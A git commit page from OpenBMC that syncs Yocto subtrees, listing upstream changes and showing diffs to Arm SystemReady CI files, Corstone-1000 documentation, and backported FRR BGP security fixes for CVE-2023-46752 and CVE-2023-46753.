diff options
| author | Andrew Geissler <geissonator@yahoo.com> | 2024-01-11 20:55:23 +0300 |
|---|---|---|
| committer | Andrew Geissler <geissonator@yahoo.com> | 2024-01-11 20:56:06 +0300 |
| commit | d4fa64b8fbad9ed7bef03090adec4a99cf9ecd5b (patch) | |
| tree | cd2f355c9c8ae01d490e733e8c83d86f89e92bc8 | |
| parent | 06a6d53090fbf4da09a79d24c2147c5d78640b0c (diff) | |
| download | openbmc-d4fa64b8fbad9ed7bef03090adec4a99cf9ecd5b.tar.xz | |
subtree updates:nanbield: Jan 11, 2024
poky: bf9f2f6f60..61a59d00a0:
Adam Johnston (1):
useradd_base: Fix sed command line for passwd-expire
Alexander Kanavin (1):
cmake: upgrade 3.27.5 -> 3.27.7
Anuj Mittal (1):
gstreamer1.0: upgrade 1.22.6 -> 1.22.7
Bastian Krause (1):
linux-firmware: add new fw file to ${PN}-rtl8821
Bruce Ashfield (25):
linux-yocto/6.1: update to v6.1.59
linux-yocto/6.1: update to v6.1.60
linux-yocto/6.5: update to v6.5.8
linux-yocto/6.5: update to v6.5.9
kern-tools: make lower context patches reproducible
kern-tools: bump SRCREV for queue processing changes
kern-tools: update SRCREV to include SECURITY.md file
kernel-yocto: improve metadata patching
linux-yocto/6.1: cfg: restore CONFIG_DEVMEM
linux-yocto/6.1: update to v6.1.61
linux-yocto/6.1: update to v6.1.62
linux-yocto/6.1: update to v6.1.65
linux-yocto/6.5: cfg: restore CONFIG_DEVMEM
linux-yocto/6.5: update to v6.5.10
linux-yocto/6.5: cfg: split runtime and symbol debug
linux-yocto/6.5: update to v6.5.11
linux-yocto/6.5: update to v6.5.12
linux-yocto/6.5: update to v6.5.13
linux-yocto/6.1: drop removed IMA option
linux-yocto-rt/6.1: update to -rt18
linux-yocto/6.1: update to v6.1.66
linux-yocto/6.1: update to v6.1.67
linux-yocto/6.1: update to v6.1.68
linux-yocto/6.5: drop removed IMA option
linux-yocto/6.5: fix AB-INT: QEMU kernel panic: No irq handler for vector
Chen Qi (1):
systemd: fix DynamicUser issue
Deepthi Hemraj (1):
rust: Fix CVE-2023-40030
Dhairya Nagodra (2):
cve-update-nvd2-native: faster requests with API keys
cve-update-nvd2-native: increase the delay between subsequent request failures
Dmitry Baryshkov (9):
linux-firmware: upgrade 20230804 -> 20231030
linux-firmware: add missing depenencies on license packages
linux-firmware: add notice file to sdm845 modem firmware
linux-firmware: add audio topology symlink to the X13's audio package
linux-firmware: package firmware for Qualcomm Adreno a702
linux-firmware: package firmware for Qualcomm QCM2290 / QRB4210
linux-firmware: package Qualcomm Venus 6.0 firmware
linux-firmware: package Robotics RB5 sensors DSP firmware
meson: use correct targets for rust binaries
Fahad Arslan (1):
linux-firmware: create separate packages
Javier Tia (1):
kernel-arch: use ccache only for compiler
Jermain Horsman (2):
lib/oe/buildcfg.py: Include missing import
lib/oe/buildcfg.py: Remove unused parameter
Joakim Tjernlund (1):
sed -i destroys symlinks
Joshua Watt (1):
bitbake: asyncrpc: Add context manager API
Julien Stephan (2):
devtool: fix update-recipe dry-run mode
devtool: finish/update-recipe: restrict mode srcrev to recipes fetched from SCM
Justin Bronder (1):
contributor-guide: add License-Update tag
Khem Raj (1):
python3-urllib3: Upgrade to 2.0.7
Lee Chee Yang (10):
migration-guides: add release notes for 4.3.1
migration-guide: add release notes for 4.2.4
migration-guide: add release notes for 4.0.14
migration-guides: reword fix in release-notes-4.3.1
migration-guides: add release notes for 4.0.15
avahi: add CVE-2023-38473.patch to SRC_URL
grub: fix CVE-2023-4692 CVE-2023-4693
curl: fix CVE-2023-46218
perlcross: update to 1.5.2
perl: 5.38.0 -> 5.38.2
Marco Felsch (1):
json-c: fix icecc compilation
Markus Volk (3):
gtk: Add rdepend on printbackend for cups
bluez5: fix connection for ps5/dualshock controllers
cups: Add root,sys,wheel to system groups
Marta Rybczynska (1):
bitbake: toastergui: verify that an existing layer path is given
Massimiliano Minella (1):
systemd: update LICENSE statement
Michael Opdenacker (14):
migration-guides: release 3.5 is actually 4.0
contributor-guide: fix command option
dev-manual: layers: update link to YP Compatible form
ref-manual: releases.svg: update nanbield release status
manuals: fix URL
test-manual: text and formatting fixes
test-manual: resource updates
test-manual: add links to python unittest
test-manual: explicit or fix file paths
test-manual: add or improve hyperlinks
dev-manual: runtime-testing: fix test module name
test-manual: use working example
systemd-compat-units.bb: fix postinstall script
ref-manual: update tested and supported distros
Paul Barker (1):
ref-manual: Fix reference to MIRRORS/PREMIRRORS defaults
Peter Kjellerstedt (3):
oeqa/selftest/tinfoil: Add tests that parse virtual recipes
dev-manual: Discourage the use of SRC_URI[md5sum]
bitbake: command: Make parseRecipeFile() handle virtual recipes correctly
Peter Marko (2):
cve-update-nvd2-native: remove unused variable CVE_SOCKET_TIMEOUT
cve-update-nvd2-native: make number of fetch attemtps configurable
Randy MacLeod (1):
strace: backport fix for so_peerpidfd-test
Rasmus Villemoes (1):
perf: lift TARGET_CC_ARCH modification out of security_flags.inc
Richard Purdie (7):
qemu: Upgrade 8.1.0 -> 8.1.2
sstate: Ensure sstate searches update file mtime
testimage: Exclude wtmp from target-dumper commands
bitbake: lib/bb: Add workaround for libgcc issues with python 3.8 and 3.9
linux/cve-exclusion6.1: Update to latest kernel point release
package_ipk: Fix Source: field variable dependency
testimage: Drop target_dumper and most of monitor_dumper
Ross Burton (6):
xwayland: upgrade to 23.2.2
linux-yocto: update CVE exclusions
linux-yocto: update CVE exclusions
lib/oe/patch: ensure os.chdir restoring always happens
tcl: skip timing-dependent tests in run-ptest
tcl: skip async and event tests in run-ptest
Shubham Kulkarni (1):
tzdata: Upgrade to 2023d
Simone Weiß (1):
manuals: brief-yoctoprojectqs: align variable order with default local.conf
Steve Sakoman (2):
poky.conf: bump version for 4.3.2 release
build-appliance-image: Update to nanbield head revision
Sundeep KOKKONDA (2):
glibc: stable 2.38 branch updates
binutils: stable 2.41 branch updates
Tim Orling (2):
lsb-release: use https for UPSTREAM_CHECK_URI
vim: upgrade 9.0.2068 -> 9.0.2130
Trevor Gamblin (2):
python3-ptest: skip test_storlines
patchtest: shorten patch signed-off-by test output
Vijay Anusuri (1):
avahi: backport Debian patches to fix multiple CVE's
Viswanath Kraleti (1):
systemd-boot: Fix build issues on armv7a-linux
Vyacheslav Yurkov (1):
lib/oe/path: Deploy files can start only with a dot
Wang Mingyu (16):
base-passwd: upgrade 3.6.1 -> 3.6.2
enchant2: upgrade 2.6.1 -> 2.6.2
harfbuzz: upgrade 8.2.1 -> 8.2.2
libjpeg-turbo: upgrade 3.0.0 -> 3.0.1
libnewt: upgrade 0.52.23 -> 0.52.24
libnsl2: upgrade 2.0.0 -> 2.0.1
msmtp: upgrade 1.8.24 -> 1.8.25
glib-2.0: upgrade 2.78.0 -> 2.78.1
xserver-xorg: upgrade 21.1.8 -> 21.1.9
ghostscript: upgrade 10.02.0 -> 10.02.1
libsolv: upgrade 0.7.25 -> 0.7.26
bind: upgrade 9.18.19 -> 9.18.20
ell: upgrade 0.59 -> 0.60
libgcrypt: upgrade 1.10.2 -> 1.10.3
libxslt: upgrade 1.1.38 -> 1.1.39
log4cplus: upgrade 2.1.0 -> 2.1.1
William Lyu (1):
openssl: improve handshake test error reporting
Zoltán Böszörményi (1):
update_gtk_icon_cache: Fix for GTK4-only builds
meta-raspberrypi: 8231f97534..fde68b24f0:
Lorenzo Arena (1):
docs: fix syntax for overriding fs type for initramfs image
meta-openembedded: 1750c66ae8..2da6e1b0e4:
Alexandre Belloni (1):
poco: fix branch
Christian Eggers (1):
python3-gcovr: switch to main branch
Dylan Turner (1):
apache2: v2.4.57 to v2.4.58 to fix CVE-2023-43622
Edi Feschiyan (1):
libbytesize: update SRC_URI
Fabio Estevam (3):
openocd: Use https for github
python3-piccata: Use https for github
multipath-tools: Use https for github
Jeffrey Pautler (1):
apache2: add vendor to product name used for CVE checking
Jonas Gorski (1):
frr: fix CVEs CVE-2023-4675{2,3} and CVE-2023-4723{4,5}
Khem Raj (3):
hwdata: upgrade 0.370 -> 0.375
openvpn: upgrade 2.6.3 -> 2.6.6
python3-scapy: upgrade to latest revision
Ross Burton (1):
yajl: fix CVE-2017-16516, CVE-2022-24795, CVE-2023-33460
Wang Mingyu (3):
hdf5: Fix install conflict when enable multilib.
dnf-plugin-tui: Recover BBCLASSEXTEND variants
strongswan: upgrade 5.9.11 -> 5.9.12
Zoltán Böszörményi (3):
python3-ninja-syntax: Set BBCLASSEXTEND = "native nativesdk"
python3-ninja: Set BBCLASSEXTEND = "native nativesdk"
geos: Fix packaging
meta-arm: 0bd7fece41..79c52afe74:
Debbie Martin (2):
arm-systemready: Add parted dependency and inherit testimage
ci: Add Arm SystemReady firmware and IR ACS builds
Harsimran Singh Tungal (1):
arm-bsp/documentation: corstone1000: fix the steps in the user guide and instructions
Change-Id: I9e8e09b85674d653415c01932a5f7a3cbeca877e
Signed-off-by: Andrew Geissler <geissonator@yahoo.com>
182 files changed, 4542 insertions, 847 deletions
diff --git a/meta-arm/.gitlab-ci.yml b/meta-arm/.gitlab-ci.yml index 9dee580705..22ecfd713a 100644 --- a/meta-arm/.gitlab-ci.yml +++ b/meta-arm/.gitlab-ci.yml @@ -9,6 +9,8 @@ variables: # by default FF_KUBERNETES_HONOR_ENTRYPOINT: 1 FF_USE_LEGACY_KUBERNETES_EXECUTION_STRATEGY: 0 + ACS_TEST: 0 + ACS_TAG: "" stages: - prep @@ -67,8 +69,8 @@ stages: name: "logs" when: always paths: - - $CI_PROJECT_DIR/work/build/tmp/work*/**/temp/log.do_*.* - - $CI_PROJECT_DIR/work/build/tmp/work*/**/testimage/* + - $CI_PROJECT_DIR/work/build/tmp*/work*/**/temp/log.do_*.* + - $CI_PROJECT_DIR/work/build/tmp*/work*/**/testimage/* # # Prep stage, update repositories once. @@ -126,6 +128,20 @@ fvp-base: matrix: - TESTING: testimage - FIRMWARE: edk2 + - SYSTEMREADY_FIRMWARE: arm-systemready-firmware + +arm-systemready-ir-acs: + extends: .build + timeout: 12h + parallel: + matrix: + # arm-systemready-ir-acs must be specified after fvp-base for ordering + # purposes for the jobs-to-kas output. It is not enough to just have it + # in the job name because fvp-base.yml overwrites the target. + - PLATFORM: fvp-base + ARM_SYSTEMREADY_IR_ACS: arm-systemready-ir-acs + tags: + - ${ACS_TAG} fvps: extends: .build diff --git a/meta-arm/ci/arm-systemready-firmware.yml b/meta-arm/ci/arm-systemready-firmware.yml new file mode 100644 index 0000000000..1854c2ab65 --- /dev/null +++ b/meta-arm/ci/arm-systemready-firmware.yml @@ -0,0 +1,4 @@ +header: + version: 11 + includes: + - kas/arm-systemready-firmware.yml diff --git a/meta-arm/ci/arm-systemready-ir-acs.yml b/meta-arm/ci/arm-systemready-ir-acs.yml new file mode 100644 index 0000000000..6cfead6c2d --- /dev/null +++ b/meta-arm/ci/arm-systemready-ir-acs.yml @@ -0,0 +1,14 @@ +header: + version: 11 + includes: + - kas/arm-systemready-ir-acs.yml + +env: + ACS_TEST: "0" + +local_conf_header: + testimage: | + TESTIMAGE_AUTO = "${ACS_TEST}" + +target: + - arm-systemready-ir-acs diff --git a/meta-arm/kas/arm-systemready-ir-acs.yml b/meta-arm/kas/arm-systemready-ir-acs.yml index 38604d7f87..aef3e71221 100644 --- a/meta-arm/kas/arm-systemready-ir-acs.yml +++ b/meta-arm/kas/arm-systemready-ir-acs.yml @@ -8,10 +8,5 @@ env: # The full testimage run typically takes around 12-24h on fvp-base. TEST_OVERALL_TIMEOUT: "${@ 24*60*60}" -local_conf_header: - systemready-ir-acs: | - IMAGE_CLASSES:append = " testimage" - - target: - arm-systemready-ir-acs diff --git a/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst b/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst index ce8bd7e0d0..6bc8aceab8 100644 --- a/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst +++ b/meta-arm/meta-arm-bsp/documentation/corstone1000/software-architecture.rst @@ -235,7 +235,7 @@ References .. _Arm security features: https://www.arm.com/architecture/security-features/platform-security .. _linux repo: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ .. _FF-A: https://developer.arm.com/documentation/den0077/latest -.. _FF-M: https://developer.arm.com/-/media/Files/pdf/PlatformSecurityArchitecture/Architect/DEN0063-PSA_Firmware_Framework-1.0.0-2.pdf?revision=2d1429fa-4b5b-461a-a60e-4ef3d8f7f4b4&hash=3BFD6F3E687F324672F18E5BE9F08EDC48087C93 +.. _FF-M: https://developer.arm.com/architectures/Firmware%20Framework%20for%20M-Profile .. _FWU: https://developer.arm.com/documentation/den0118/a/ .. _OPTEE-OS: https://github.com/OP-TEE/optee_os .. _PSA: https://www.psacertified.org/ diff --git a/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst b/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst index 134ed41d01..318cddfd7d 100644 --- a/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst +++ b/meta-arm/meta-arm-bsp/documentation/corstone1000/user-guide.rst @@ -18,7 +18,7 @@ for more information. Prerequisites ------------- -This guide assumes that your host PC is running Ubuntu 20.04 LTS, with at least +This guide assumes that your host machine is running Ubuntu 20.04 LTS, with at least 32GB of free disk space and 16GB of RAM as minimum requirement. The following prerequisites must be available on the host system: @@ -435,7 +435,7 @@ running the ACS tests. dd conv=notrunc if=openSUSE-Tumbleweed-ARM-JeOS-efi.aarch64-<date>-Snapshot<date>.raw skip=<blockaddress_1st_partition> of=corstone1000-efi-partition.img seek=<blockaddress_1st_partition> iflag=fullblock seek=<blockaddress_1st_partition> bs=512 count=<sectorsize_1s_partition> && sync -#. Use the provided disk-layout below to label the ESP correctly. +#. Create the file efi_disk.layout locally. Copy the content of provided disk layout below to the efi_disk.layout to label the ESP correctly. efi_disk.layout :: @@ -470,7 +470,10 @@ running the ACS tests. **Using ESP in FPGA:** Once the ESP is created, it needs to be flashed to a second USB drive different than ACS image. -This can be done with the development machine. +This can be done with the development machine. In the given example here +we assume the USB device is ``/dev/sdb`` (the user should use ``lsblk`` command to +confirm). Be cautious here and don't confuse your host machine own hard drive with the +USB drive. Run the following commands to prepare the ACS image in USB stick: :: @@ -560,7 +563,7 @@ BOOT partition contains the following: └── ramdisk-busybox.img RESULT partition is used to store the test results. -**NOTE**: PLEASE MAKE SURE THAT THE RESULT PARTITION IS EMPTY BEFORE YOU START THE TESTING. OTHERWISE THE TEST RESULTS +**NOTE**: PLEASE MAKE SURE THAT "acs_results" FOLDER UNDER THE RESULT PARTITION IS EMPTY BEFORE YOU START THE TESTING. OTHERWISE THE TEST RESULTS WILL NOT BE CONSISTENT FPGA instructions for ACS image @@ -589,7 +592,7 @@ SystemReady release in this repository. Then, the user should prepare a USB stick with ACS image. In the given example here, we assume the USB device is ``/dev/sdb`` (the user should use ``lsblk`` command to -confirm). Be cautious here and don't confuse your host PC's own hard drive with the +confirm). Be cautious here and don't confuse your host machine own hard drive with the USB drive. Run the following commands to prepare the ACS image in USB stick: :: @@ -604,6 +607,11 @@ and then boot the board. The FPGA will reset multiple times during the test, and it might take approx. 24-36 hours to finish the test. +**NOTE**: The USB stick which contains the ESP partition might cause grub to +unable to find the bootable partition (only in the FPGA). If that's the case, please +remove the USB stick and run the ACS tests. ESP partition can be mounted after +the platform is booted to linux at the end of the ACS tests. + FVP instructions for ACS image and run ====================================== @@ -639,6 +647,20 @@ the test. At the end of test, the FVP host terminal will halt showing a shell pr Once test is finished, the FVP can be stoped, and result can be copied following above instructions. +**NOTE:** A rare issue has been noticed (5-6% occurence) during which the FVP hangs during booting the system while running ACS tests. +If this happens, please apply the following patch, rebuild the software stack for FVP and re-run the ACS tests. + +:: + + cd <_workspace> + git clone https://git.gitlab.arm.com/arm-reference-solutions/systemready-patch.git -b CORSTONE1000-2023.11 + cp -f systemready-patch/embedded-a/corstone1000/sr_ir_workaround/0001-embedded-a-corstone1000-sr-ir-workaround.patch meta-arm + cd meta-arm + git am 0001-embedded-a-corstone1000-sr-ir-workaround.patch + cd .. + kas shell meta-arm/kas/corstone1000-fvp.yml:meta-arm/ci/debug.yml -c="bitbake u-boot -c cleanall; bitbake trusted-firmware-a -c cleanall; corstone1000-image -c cleanall; bitbake corstone1000-image" + + Common to FVP and FPGA ====================== @@ -657,7 +679,7 @@ The results can be fetched from the ``acs_results`` folder in the RESULT partiti Manual capsule update and ESRT checks ------------------------------------- -The following section describes running manual capsule update with the ``direct`` method. +The following section describes running manual capsule update. The steps described in this section perform manual capsule update and show how to use the ESRT feature to retrieve the installed capsule details. @@ -681,6 +703,13 @@ Download u-boot under <_workspace> and install tools: make tools-only_defconfig make tools-only +**NOTE:** The following error could happen if the linux build system does not have "libgnutls28-dev". + **error: "tools/mkeficapsule.c:21:10: fatal error: gnutls/gnutls.h: No such file or directory"**. If that's the case please install libgnutls28-dev and its dependencies by using the following command. + +:: + + sudo apt-get install -y libgnutls28-dev + Download systemready-patch repo under <_workspace>: :: @@ -788,20 +817,7 @@ Then, unmount the IR image: sudo umount /mnt/test -**NOTE:** - -The size of first partition in the image file is calculated in the following way. The data is -just an example and might vary with different ir-acs-live-image-generic-arm64.wic files. - -:: - - fdisk -lu <path-to-img>/ir-acs-live-image-generic-arm64.wic - -> Device Start End Sectors Size Type - <path-to-img>/ir-acs-live-image-generic-arm64.wic1 2048 206847 204800 100M Microsoft basic data - <path-to-img>/ir-acs-live-image-generic-arm64.wic2 206848 1024239 817392 399.1M Linux filesystem - <path-to-img>/ir-acs-live-image-generic-arm64.wic3 1026048 1128447 102400 50M Microsoft basic data - - -> <offset_1st_partition> = 2048 * 512 (sector size) = 1048576 +**NOTE:** Please refer to `FVP instructions for ACS image and run`_ section to find the first partition offset. ****************************** Performing the capsule update @@ -819,10 +835,7 @@ Run the FVP with the IR prebuilt image: <_workspace>/meta-arm/scripts/runfvp --terminals=xterm <_workspace>/build/tmp/deploy/images/corstone1000-fvp/corstone1000-image-corstone1000-fvp.fvpconf -- -C board.msd_mmc.p_mmc_file=<path-to-img>/ir-acs-live-image-generic-arm64.wic -**NOTE:** - -<path-to-img> must start from the root directory. -make sure there are no spaces before or after of "=". board.msd_mmc.p_mmc_file=<path-to-img>/ir-acs-live-image-generic-arm64.wic. +**NOTE:** <path-to-img> must start from the root directory. make sure there are no spaces before or after of "=". board.msd_mmc.p_mmc_file=<path-to-img>/ir-acs-live-image-generic-arm64.wic. Running the FPGA with the IR prebuilt image =========================================== @@ -1060,6 +1073,15 @@ documentation. On FPGA, please update the cs1000.bin on the SD card with the newly generated wic file. +**NOTE:** Skip the shim patch only applies to Debian installation. The user should remove the patch from meta-arm before running the software to boot OpenSUSE or executing any other tests in this user guide. You can make sure of removing the skip the shim patch by executing the steps below. + +:: + + cd <_workspace>/meta-arm + git reset --hard HEAD~1 + cd .. + kas shell meta-arm/kas/corstone1000-fvp.yml:meta-arm/ci/debug.yml -c="bitbake u-boot -c cleanall; bitbake trusted-firmware-a -c cleanall; corstone1000-image -c cleanall; bitbake corstone1000-image" + ************************************************* Preparing the Installation Media ************************************************* @@ -1084,7 +1106,7 @@ This can be done with your development machine. In the example given below, we assume the USB device is ``/dev/sdb`` (the user should use the `lsblk` command to confirm). -**NOTE:** Please don't confuse your host PC's own hard drive with the USB drive. +**NOTE:** Please don't confuse your host machine own hard drive with the USB drive. Then, copy the contents of the iso file into the first USB stick by running the following command in the development machine: @@ -1100,6 +1122,7 @@ To test Linux distro install and boot on FVP, the user should prepare an mmc ima With a minimum size of 8GB formatted with gpt. :: + #Generating mmc2 dd if=/dev/zero of=<_workspace>/mmc2_file.img bs=1 count=0 seek=8G; sync; parted -s mmc2_file.img mklabel gpt @@ -1147,7 +1170,7 @@ As the installation process for Debian is different than the one for openSUSE, Debian may need some extra steps, that are indicated below: During Debian installation, please answer the following question: - - "Force GRUB installation to the EFI removable media path?" Yes + - "Force grub installation to the EFI removable media path?" Yes - "Update NVRAM variables to automatically boot into Debian?" No If the grub installation fails, these are the steps to follow on the subsequent @@ -1198,7 +1221,7 @@ and run this command to boot into the installed OS: <_workspace>/meta-arm/scripts/runfvp --terminals=xterm <_workspace>/build/tmp/deploy/images/corstone1000-fvp/corstone1000-image-corstone1000-fvp.fvpconf -- -C board.msd_mmc.p_mmc_file="<_workspace>/mmc2_file.img" -Once the FVP begins booting, you will need to quickly change the boot option in GRUB, +Once the FVP begins booting, you will need to quickly change the boot option in grub, to boot into recovery mode. **NOTE:** This option will disappear quickly, so it's best to preempt it. @@ -1212,11 +1235,21 @@ Proceed to edit the following files accordingly: :: - vi /etc/systemd/system.conf #Only applicable to Debian + #Only applicable to Debian + vi /etc/systemd/system.conf DefaultDeviceTimeoutSec=infinity - vi /usr/lib/systemd/system.conf # Only applicable to openSUSE + +:: + + #Only applicable to openSUSE + vi /usr/lib/systemd/system.conf DefaultDeviceTimeoutSec=infinity + The system.conf has been moved from /etc/systemd/ to /usr/lib/systemd/ and directly modifying + the /usr/lib/systemd/system.conf is not working and it is getting overridden. We have to create + drop ins system configurations in /etc/systemd/system.conf.d/ directory. So, copy the + /usr/lib/systemd/system.conf to /etc/systemd/system.conf.d/ directory after the mentioned modifications. + The file to be edited next is different depending on the installed distro: :: @@ -1242,6 +1275,8 @@ The user should see a login prompt after booting, for example, for debian: Login with the username root and its corresponding password (already set at installation time). +**NOTE:** Debian/OpenSUSE Timeouts are not applicable for all systems. Some systems are faster than the others (especially when running the FVP) and works well with default timeouts. If the system boots to Debian or OpenSUSE unmodified, the user can skip this section. + PSA API tests ------------- @@ -1261,7 +1296,7 @@ First, load FF-A TEE kernel module: :: - insmod /lib/modules/*-yocto-standard/extra/arm-ffa-tee.ko + insmod /lib/modules/*-yocto-standard/updates/arm-ffa-tee.ko Then, check whether the FF-A TEE driver is loaded correctly by using the following command: @@ -1273,7 +1308,7 @@ The output should be: :: - arm_ffa_tee 16384 - - Live 0xffffffc000510000 (O) + arm_ffa_tee <ID> - - Live <address> (O) Now, run the PSA API tests in the following order: diff --git a/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass b/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass index e988802368..28e800c866 100644 --- a/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass +++ b/meta-arm/meta-arm-systemready/classes/arm-systemready-acs.bbclass @@ -12,12 +12,11 @@ INHIBIT_DEFAULT_DEPS = "1" COMPATIBLE_HOST = "aarch64-*" PACKAGE_ARCH = "${MACHINE_ARCH}" -inherit nopackages deploy rootfs-postcommands ${IMAGE_CLASSES} python3native +inherit nopackages deploy rootfs-postcommands ${IMAGE_CLASSES} python3native testimage do_configure[noexec] = "1" do_compile[noexec] = "1" do_install[noexec] = "1" -do_testimage[depends] += "mtools-native:do_populate_sysroot" # Deploy with this suffix so it is picked up in the machine configuration IMAGE_DEPLOY_SUFFIX ?= ".wic" @@ -80,7 +79,9 @@ RM_WORK_EXCLUDE_ITEMS += "${@ os.path.basename(d.getVar('TEST_LOG_DIR')) }" do_testimage[postfuncs] += "acs_logs_handle" do_testimage[depends] += "edk2-test-parser-native:do_populate_sysroot \ - arm-systemready-scripts-native:do_populate_sysroot" + arm-systemready-scripts-native:do_populate_sysroot \ + mtools-native:do_populate_sysroot \ + parted-native:do_populate_sysroot" # Process the logs python acs_logs_handle() { diff --git a/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb b/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb index cc3f2ee1dd..4858e4e579 100644 --- a/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb +++ b/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb @@ -16,7 +16,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263" # If you want ptest support, use the git repo # UTscapy does not exist in the pypi pkg # -SRCREV = "9473f77d8b548c8e478e52838bdd4c12f5d4f4ff" +SRCREV = "0474c37bf1d147c969173d52ab3ac76d2404d981" SRC_URI = "git://github.com/secdev/scapy.git;branch=master;protocol=https \ file://run-ptest" diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch new file mode 100644 index 0000000000..e1f30248ca --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch @@ -0,0 +1,125 @@ +From b08afc81c60607a4f736f418f2e3eb06087f1a35 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Fri, 20 Oct 2023 17:49:18 +0300 +Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session + reset + +Avoid crashing bgpd. + +``` +(gdb) +bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341 +2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN); +(gdb) +stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320 +320 { +(gdb) +321 STREAM_VERIFY_SANE(s); +(gdb) +323 if (STREAM_READABLE(s) < size) { +(gdb) +34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest)); +(gdb) + +Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault. +0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050, + object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282 +2282 if (path->attr->aspath->refcnt) +(gdb) +``` + +With the configuration: + +``` + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + address-family ipv4 unicast + redistribute connected + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b08afc81c60607a4f736f418f2e3eb06087f1a35] +CVE: CVE-2023-46752 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 6 +----- + bgpd/bgp_attr.h | 1 - + bgpd/bgp_packet.c | 6 +----- + 3 files changed, 2 insertions(+), 11 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 6925aff727e2..e7bb42a5d989 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2421,7 +2421,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args, + + mp_update->afi = afi; + mp_update->safi = safi; +- return BGP_ATTR_PARSE_EOR; ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0); + } + + mp_update->afi = afi; +@@ -3759,10 +3759,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + goto done; + } + +- if (ret == BGP_ATTR_PARSE_EOR) { +- goto done; +- } +- + if (ret == BGP_ATTR_PARSE_ERROR) { + flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, + "%s: Attribute %s, parse error", peer->host, +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 961e5f122470..fc347e7a1b4b 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -364,7 +364,6 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, +- BGP_ATTR_PARSE_EOR = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index b585591e2f69..5ecf343b6657 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -2397,8 +2397,7 @@ static int bgp_update_receive(struct peer_connection *connection, + * Non-MP IPv4/Unicast EoR is a completely empty UPDATE + * and MP EoR should have only an empty MP_UNREACH + */ +- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) +- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) { ++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) { + afi_t afi = 0; + safi_t safi; + struct graceful_restart_info *gr_info; +@@ -2419,9 +2418,6 @@ static int bgp_update_receive(struct peer_connection *connection, + && nlris[NLRI_MP_WITHDRAW].length == 0) { + afi = nlris[NLRI_MP_WITHDRAW].afi; + safi = nlris[NLRI_MP_WITHDRAW].safi; +- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) { +- afi = nlris[NLRI_MP_UPDATE].afi; +- safi = nlris[NLRI_MP_UPDATE].safi; + } + + if (afi && peer->afc[afi][safi]) { +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch new file mode 100644 index 0000000000..6bf159aba8 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch @@ -0,0 +1,117 @@ +From d8482bf011cb2b173e85b65b4bf3d5061250cdb9 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 23 Oct 2023 23:34:10 +0300 